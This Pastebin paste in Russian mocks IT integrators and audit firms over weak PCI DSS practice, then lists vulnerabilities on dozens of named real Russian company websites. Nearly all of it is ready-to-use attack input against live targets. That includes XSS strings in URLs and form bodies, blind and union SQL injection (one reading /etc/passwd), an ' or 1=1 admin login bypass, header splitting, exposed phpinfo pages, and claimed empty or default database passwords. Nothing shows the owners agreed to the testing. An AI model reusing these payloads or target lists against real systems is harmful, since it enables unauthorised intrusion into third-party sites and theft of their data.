Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Продолжая мысль про "бумажных специалистов" обсуждаемую на хабре: http://habrahabr.ru/post/169491/
- Вот вам пример таких бумажных спецов:
- Сейчас некоторые интеграторы и аудиторские компании договариваются с банками о заведомо успешной сертификации в рамках PCI DSS.
- А именно, о том что сертификации будет подвергаться не вся сеть банка, а только несколько ipшников платежного сегмента....
- После такого сотрудничества, потом выясняются такие моменты, что в комментариях к пользователям AD хрянятся их пароли) Чего достаточно для авторизации в самом платежном сегменте. =)
- На каждом ресурсе много уязвимостей, это лишь часть из них...
- ЗЫ: Поделитесь инвайтом на хабр habrleaks@mail.ru :D
- -------------------------------------------------------------------------------------------
- csbigroup.ru /search/?search_query=%00
- 3306/tcp MySQL «root;»
- -------------------------------------------------------------------------------------------
- kami.ru/!go?ln=l[100045].html&c$=200595XSS%40<script>XSS</script>.com&d$=Промо%2Dакции
- -------------------------------------------------------------------------------------------
- digdes.ru/training/register/?id=ms10748XSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- ics.perm.ru FTP bounce
- -------------------------------------------------------------------------------------------
- z-it.ru/about/novosti-kompanii/company/13.01.2011?searched=%D0%BF%D0%BE%D0%B8%D1%81%D0%BA&advsearch=oneword&highlight=ajaxSearch%5Fhighlight%2BajaxSearch%5Fhighlight1
- The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in <b>/var/www/manager/includes/config.inc.php</b> on line <b>60</b><br />
- -------------------------------------------------------------------------------------------
- ussc.ru/phpinfo.php
- -------------------------------------------------------------------------------------------
- http://ascon.ru/
- POST /subscribe/?act=subs HTTP/1.1
- Host: ascon.ru
- lastname=XSS%40<script>XSS</script>.com&firstname=1&middlename=1&email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com
- -------------------------------------------------------------------------------------------
- galex.ru
- BlindSQLInjection
- www.galex.ru/about/news.php?id1=[SQL]
- www.galex.ru/search/?PHPSESSID=948cffbf1d1f118f0d2edb64a2f81978&query=XSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- avicomp.ru/phpinfo.php
- /cgi-bin/printenv
- -------------------------------------------------------------------------------------------
- naumen.ru/clients?filter=s_9999) union select 1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- s&show_comments=1
- http://www.naumen.ru/tests/
- -------------------------------------------------------------------------------------------
- www.asbc.ru
- HTTP Spliting
- -------------------------------------------------------------------------------------------
- hostco.ru/viewImage.htm?pic=XSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- BlindSQLInjection
- itrealty.ru/about.php?RubricID=[SQL]
- http://www.itrealty.ru/adm/pic.php?PicID=288%2D1%20and%201%3D1
- itrealty.ru/t.php
- www.itrealty.ru/news.php?page=XSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- cbs.ru
- POST /site/faq/?section=9476 HTTP/1.1
- Host: www.cbs.ru
- ref=Вопросы%20и%20ответы&feedback_name=1&feedback_email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com&feedback_tel=1&feedback_captcha1=1&enc_captcha=d95824e0942acae54839c042675d230883effe9b&feedback_submit=Отправить&feedback_message=XSS%40<script>XSS</script>.com
- www.cbs.ru/site/news/?vendor=all'&page=1
- -------------------------------------------------------------------------------------------
- SQLInjection
- POST /admin_sr/admin_login.php HTTP/1.1
- Host: www.saprun.com
- adminLog='&adminpasswordec=1
- Логин: «’ or 1=1 -- s»
- -------------------------------------------------------------------------------------------
- www.lanit.ru
- http://www.lanit.ru/projects/index.php?PAGEN_1=2&GROUP=0&BUSINESS=0®ION=0&q='
- from b_iblock_element where name like ''%' and active = 'Y' and iblock_id = 8</font>[You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and active = 'Y' and iblock_id = 8' at line 1]<br><br>
- -------------------------------------------------------------------------------------------
- www.technoserv.com
- www.technoserv.com/about/company/press/news/?PAGEN_1=2XSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- www.croc.ru/search/?s=1&q=1XSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- POST /choosevac.asp HTTP/1.1
- Host: www.ibs.ru
- choose1=/content/rus/628/6283%2Darticle.aspXSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- 1c.ru/rus/partners/training/cso/timetable.jsp?f=1&city=[SQL]
- 1c.ru/search/search.cgi?wm=wrdXSS%40<script>XSS</script>.com&wf=2221&GroupBySite=no&ul=http%3A//www.1c.ru&q=1&cmd=Поиск
- -------------------------------------------------------------------------------------------
- www.compulink.ru
- POST /feedback/
- FIO=1&EMAIL=XSS%40<script>XSS</script>.com&COMPANY=1&send_feedback=qwe&COMMENT=1
- GET /redirect.php?url=%0D%0AHeader%3A%20Value&1 HTTP/1.0
- <b>Warning</b>: Header may not contain more than a single header, new line detected in <b>/home/u289824/compulink.ru/www/redirect.php</b> on line <b>46</b><br />
- -------------------------------------------------------------------------------------------
- www.asteros.ru/webmail/
- -------------------------------------------------------------------------------------------
- www.i-teco.ru/news-arh.php?id=785’ union select 1,2,3 limit 1,1 –- s
- SQL база данных: sql.php “admin;<пусто>”
- -------------------------------------------------------------------------------------------
- www.avirsa.ru
- POST /ru/subscribe HTTP/1.1
- Host: avirsa.ru
- email=Введите%20ваш%20e%2Dmail%20XSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- GET /kownjfxq.htm HTTP/1.1
- Host: www.epam-group.ru
- Referer: kmmmi<script>XSS</script>.com
- www.epam.com/download.html?downloadParam=/content/dam/epam/library/analysts/CMSXSS%40<script>XSS</script
- -------------------------------------------------------------------------------------------
- www.cft.ru/sitePages/feedback.aspx?to=E.Vinichenko%40cft.ruXSS%40<script>XSS</script>.com&from=http%3A//www.cft.ru/services/basic/Pages/default.asp
- www.cft.ru/events/pages/events.aspx?year=XSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- BlindSQLInjection
- www.ramec.ru/news/archives/?year=[SQL]
- www.ramec.ru Referer: 1XSS@<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- tatintec.ru/xjnaq<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- BlindSQLInjection
- http://it.ru/ru/search/?m=all&np=1&ps=10&q=1&s_result_area_id72=72&sp=1&sy=1&ul=http%3A//www.it.ru/'&wf=2221&wm=wrd
- -------------------------------------------------------------------------------------------
- amt.ru/company/article.aspx?art_id=myvalue"%20myattribute%3D"java%3Ascript(XSS)"%20
- -------------------------------------------------------------------------------------------
- fors.ru/pls/portal/PORTAL.wwpob_home_page.popup?popup_name=securityXSS%40<script>XSS</script>.com
- fors.ru/pls/portal/PORTAL.wwpob_home_page.popup?popup_name=categoriesXSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- GET /web/guest/about?p_p_id=82&p_p_action=1&p_p_state=normal&p_p_mode=viewXSS%40<script>XSS</script>.com&p_p_col_id=1&p_p_col_pos=0&p_p_col_count=0&_82_struts_action=/language/view&languageId=ru%5FRU HTTP/1.1
- Host: www.icl.ru
- -------------------------------------------------------------------------------------------
- Host: www.stinscoman.com
- Cookie: SN4c5904931312f=%00;
- sion id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in F:\www\stinscoman.com\manager\includes\config.inc.php on line 60
- -------------------------------------------------------------------------------------------
- XSS
- ecoprog.ru/admin/
- -------------------------------------------------------------------------------------------
- www.letagroup.ru/rus/library/?company=21XSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- otr.ru/phpinfo.php
- -------------------------------------------------------------------------------------------
- ret.ru/searchp.jsp?gid=149557&pgid=22604&gpr378748=612577XSS%40<script>XSS</script>.com&searchp=1
- -------------------------------------------------------------------------------------------
- diasoft.ru/live/sitesearch.asp?requestStr=1XSS%40<script>XSS</script>.com&useMorh=1
- -------------------------------------------------------------------------------------------
- POST /education/save.html HTTP/1.1
- Host: teleswyz.ru
- contact=1&org=1&phone=1&email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com&id='&seminar_id=4&submit=qwe
- >INSERT INTO `seminars_pretender` (`contact`, `org`, `phone`, `email`, `seminar_id`, `send_date`) VALUES ('1', '1', '1', 'mail-prof@MTkyLjE2OC4xMDAuNQ.com', NULL, '2012-08-24 22:08:37')</p><p>Filename: /usr/local/apache22/vhosts/newsite/htdocs/modules/education/controllers/education.php</p><p>
- -------------------------------------------------------------------------------------------
- avicon.ru/com.php?id_grp=0XSS%40<script>XSS</script>.com&id_com=0
- -------------------------------------------------------------------------------------------
- intertech.ru/News/body.asp?filename=20120726122915.xml
- <P>Загрузка D:\InetPub\wwwroot\News\20120726122915.xml'</P><P>Error: System error: -2146697210.
- www.intertech.ru/News/body.asp?filename=20120726122915.xmlXSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- vimcom.ru
- POST /search/ HTTP/1.1
- Host: www.vimcom.ru
- words=я%20ищу...&set=1&pole=XSS%40<script>XSS</script>.com&cat=0
- -------------------------------------------------------------------------------------------
- http://rdtex.ru/server-status
- -------------------------------------------------------------------------------------------
- SQLInjeСon insert cookies
- korusconsulting.ru
- GET /press-room/activities/reg/?eventID=150 HTTP/1.1
- Host: korusconsulting.ru
- Cookie: sid=150'; CookieID=150';
- POST /press-room/research/ HTTP/1.1
- Host: korusconsulting.ru
- sendid=1&answer[50][]=199&answer[50][0]=0&answer[51][0]=207&answer[52][0]=211&other[50]=XSS%40<script>XSS</script>.com&other[57]=1&Comments=1
- GET /about/contacts/ HTTP/1.1
- Host: korusconsulting.ru
- Cookie: sid=%00; CookieID=%00;
- session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in <b>/home/www/z166658/htdocs/korusconsulting.ru/netcat/index.php(13) : eval()'d code</b> on line <b>26</b><br />
- korusconsulting.ru/cgi-bin/php.ini
- korusconsulting.ru/phpinfo.php
- -------------------------------------------------------------------------------------------
- parus.ru
- POST /company/job/ HTTP/1.1
- Host: parus.ru
- fio=XSS%40<script>XSS</script>.com&dob=1&family=1&living_city=1&phone=1&email=mail%2Dprof%40MTkyLjE2OC4xMDAuNQ.com&cptcode=1&education=1&courses=1&experience=1&personal=1&position=0
- -------------------------------------------------------------------------------------------
- galaktika.ru
- POST /skachat?category=99&sortby=title HTTP/1.1
- Host: www.galaktika.ru
- dlsearch=XSS%40<script>XSS</script>.com&page_id=190
- -------------------------------------------------------------------------------------------
- aladdin-rd.ru/company/pressroom/events/?view=archive&PAGEN_1=2XSS%40<script>XSS</script>.com
- PHPInfo aladdin-rd.ru:443\a.php
- -------------------------------------------------------------------------------------------
- BlindSQLInjection
- fortdialog.ru/projects/?Branch=[SQL]
- GET /about/ HTTP/1.1
- Host: fortdialog.ru
- Cookie: sid=%00; QUICK_BAR_CLOSED=%00; CookieID=%00;
- -------------------------------------------------------------------------------------------
- itsirius.ru /modules/mod_maximenu_CK/themes/default/css/maximenuH_CK.php?monid=maximenuCKXSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- hetnet.ru/phpmyadmin/ “Admin;<пусто>”
- www.hetnet.ru/contacts/search/?search=поискXSS%40<script>XSS</script>.com
- -------------------------------------------------------------------------------------------
- parma-telecom.ru/conference/details.php?ID=430XSS%40<script>XSS</script>.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement